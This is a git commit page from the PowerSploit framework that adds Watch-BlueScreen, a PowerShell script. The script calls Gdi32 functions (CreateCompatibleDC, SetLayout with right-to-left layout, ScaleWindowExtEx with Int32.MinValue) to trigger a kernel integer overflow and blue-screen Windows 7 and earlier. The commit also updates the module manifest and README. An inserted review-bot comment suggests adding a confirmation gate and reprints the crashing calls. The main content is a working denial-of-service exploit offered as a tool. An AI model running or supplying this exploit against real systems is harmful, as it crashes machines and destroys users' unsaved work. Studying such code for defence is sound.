authorMatt Graeber <mattgraeber@gmail.com>2013-05-13 20:01:59 -0400
committerMatt Graeber <mattgraeber@gmail.com>2013-05-13 20:01:59 -0400
commit2a17b8fb56db07519e8e6b7d6819749ce743c882 (patch)
tree7315164342e510e3ab7b7feccdaab24204a53f3b
parentf32a572fb971f288d2950af9a6c6d2031a52df2b (diff)
downloadPowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.tar.gz
PowerSploit-2a17b8fb56db07519e8e6b7d6819749ce743c882.zip
Added Watch-BlueScreen
Causes a blue-screen (bugcheck) to occur.
-rw-r--r--CodeExecution/CodeExecution.psd12
-rw-r--r--CodeExecution/Watch-BlueScreen.ps174
-rw-r--r--README.md4
3 files changed, 79 insertions, 1 deletions
diff --git a/CodeExecution/CodeExecution.psd1 b/CodeExecution/CodeExecution.psd1
index 180c25e..c6c87f7 100644
--- a/CodeExecution/CodeExecution.psd1
+++ b/CodeExecution/CodeExecution.psd1
@@ -74,7 +74,7 @@ ModuleList = @(@{ModuleName = 'CodeExecution'; ModuleVersion = '1.0.0.0'; GUID =
# List of all files packaged with this module
FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
- 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Usage.md'
+ 'Invoke-ShellcodeMSIL.ps1', 'Invoke-ReflectiveDllInjection.ps1', 'Watch-BlueScreen.ps1', 'Usage.md'
# Private data to pass to the module specified in RootModule/ModuleToProcess
# PrivateData = ''
diff --git a/CodeExecution/Watch-BlueScreen.ps1 b/CodeExecution/Watch-BlueScreen.ps1
new file mode 100644
index 0000000..8523bf2
--- /dev/null
+++ b/CodeExecution/Watch-BlueScreen.ps1
@@ -0,0 +1,74 @@
+function Watch-BlueScreen
+{
+<#
+.SYNOPSIS
+
+ Cause a blue screen to occur (Windows 7 and below).
+
+ PowerSploit Function: Watch-BlueScreen
+ Author: Matthew Graeber (@mattifestation)
+ Original Research: Tavis Ormandy and Nikita Tarakanov
+ License: BSD 3-Clause
+ Required Dependencies: None
+ Optional Dependencies: None
+
+.NOTES
+
+ Tavis Ormandy documented this technique on 2/3/2013 and Nikita Tarakanov
+ ‏tweeted this technique on 5/13/2013.
+
+.LINK
+
+ https://gist.github.com/taviso/4658638
+ http://blog.cmpxchg8b.com/2013/02/the-other-integer-overflow.html
+ https://twitter.com/NTarakanov/status/334031968465453057
+#>
+
+ try { $Gdi32 = [Gdi32] } catch [Management.Automation.RuntimeException]
+ {
+ $DynAssembly = New-Object System.Reflection.AssemblyName('BSOD')
+ $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, 'Run')
+ $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('BSOD', $False)
+ $TypeBuilder = $ModuleBuilder.DefineType('Gdi32', 'Public, Class')
+
+ $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
+ $SetLastError = [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
+ $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder( $DllImportConstructor, @('ntdll.dll'),
+ [Reflection.FieldInfo[]]@($SetLastError), @($true))
+
+ $TypeBuilder.DefinePInvokeMethod( 'CreateCompatibleDC',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [IntPtr],
+ @([IntPtr]),
+ 'Winapi',
+ 'Auto' ).SetCustomAttribute($SetLastErrorCustomAttribute)
+
+ $TypeBuilder.DefinePInvokeMethod( 'SetLayout',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [UInt32],
+ @([IntPtr], [UInt32]),
+ 'Winapi',
+ 'Auto' ) | Out-Null
+
+ $TypeBuilder.DefinePInvokeMethod( 'ScaleWindowExtEx',
+ 'Gdi32.dll',
+ 'Public, Static',
+ 'Standard',
+ [Bool],
+ @([IntPtr], [Int32], [Int32], [Int32], [Int32], [IntPtr]),
+ 'Winapi',
+ 'Auto' ) | Out-Null
+
+ $Gdi32 = $TypeBuilder.CreateType()
+ }
+
+ $LAYOUT_RTL = 1
+
+ $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
+ $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
+ $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
+} \ No newline at end of file
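Review bot: Watch-BlueScreen crashes the host and discards any unsaved state, yet it runs unconditionally — there is no `[CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]` and no ShouldProcess gate before the three Gdi32 calls at the end of the hunk, so `-WhatIf` and `-Confirm` have no effect on a destructive command. Declare the attribute after the comment-based help and wrap the CreateCompatibleDC/SetLayout/ScaleWindowExtEx calls in a ShouldProcess check, as sketched below. Separately, the DllImport custom attribute built on the line after `$SetLastError` names 'ntdll.dll' while the DefinePInvokeMethod target is 'Gdi32.dll'; whether the pseudo-attribute's library name overrides the P/Invoke map is a runtime detail, so the two strings should agree. The help block also lacks .DESCRIPTION and .EXAMPLE sections, which the other CodeExecution scripts listed in the manifest provide.
```powershell
function Watch-BlueScreen
{
# … unchanged: comment-based help block …

    [CmdletBinding(SupportsShouldProcess = $true, ConfirmImpact = 'High')]
    param()

    # … unchanged: try/catch that defines the dynamic Gdi32 type …

    $LAYOUT_RTL = 1

    # Destructive: the host reboots and unsaved work is lost, so honor -WhatIf/-Confirm.
    if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Trigger a kernel bugcheck (blue screen)'))
    {
        $DC = $Gdi32::CreateCompatibleDC([IntPtr]::Zero)
        $Gdi32::SetLayout($DC, $LAYOUT_RTL) | Out-Null
        $Gdi32::ScaleWindowExtEx($DC, [Int32]::MinValue, -1, 1, 1, [IntPtr]::Zero) | Out-Null
    }
}
```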
diff --git a/README.md b/README.md
index 94a80e3..89ecb42 100644
--- a/README.md
+++ b/README.md
@@ -20,6 +20,10 @@ Injects shellcode into the process ID of your choosing or within PowerShell loca
Execute shellcode within the context of the running PowerShell process without making any Win32 function calls.
+#### `Watch-BlueScreen`
+
+Cause a blue screen to occur (Windows 7 and below).
+
## ScriptModification
**Modify and/or prepare scripts for execution on a compromised machine.**